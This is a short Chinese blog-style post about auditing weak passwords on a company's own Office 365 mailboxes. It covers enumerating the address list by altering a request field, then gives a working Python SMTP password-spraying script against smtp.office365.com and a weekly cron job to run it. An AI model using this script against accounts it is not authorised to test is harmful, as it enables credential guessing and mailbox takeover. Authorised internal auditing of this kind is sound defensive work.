甲方安全建设之office365邮箱弱口令检测

甲方安全建设之office365邮箱弱口令检测

信息收集

资产范围

资产列表总数是521

抓包后发现只有102

一番测试之后发现控制Response的关键在于MaxEntriesReturned字段，修改后Response达到了期望的结果

正则提取

开源中国在线正则表达式工具

python爆破脚本

import smtplib
import os
import time
# 获取当前时间以命名文件
def file_name():
    t = time.strftime('%Y-%m-%d',time.localtime())
    suffix = ".txt"
    fullname = t+suffix
    return fullname
# 使用smtp协议连接
def conn(u,p):
    s = smtplib.SMTP(host='smtp.office365.com', port=587)
    s.starttls()
    r = s.login(u,p)
    return r
    
def main():
    with open('/Users/markzhang/Desktop/user.txt','r') as user:
        with open('/Users/markzhang/Desktop/pass.txt','r') as password:
            users = user.readlines()
            passwords = password.readlines()
            for u in users:
                for p in passwords:
                    u = u.strip('\n')
                    p = p.strip('\n')
                    try:
                        res = conn(u,p)
                        #print res
                        with open('/Users/markzhang/Documents/python/security/demo.txt','w') as f:
                            #print os.getcwd()
                            os.chdir('/Users/markzhang/Documents/python/security/')
                            #重命名，将正确结果写入文件
                            os.rename('demo.txt',file_name())
                            if res[0] == 235:
                                f.write(u)
                                f.write('/')
                                f.write(p)
                                f.write('\n')

                            #os.chdir('/Users/markzhang/Documents/python/security/')
                            #os.rename('demo.txt',file_name())
                            
                        
                    except Exception as e:
                        print 'wrong account/pass',u,'/',p,e
                    
                    
if __name__ == '__main__':
    main()
    

添加定时任务

crontab -e添加内容如下，每周四的12:30执行

30 12 * * 4 cd /Users/markzhang/Documents/python/security/;python outlook.py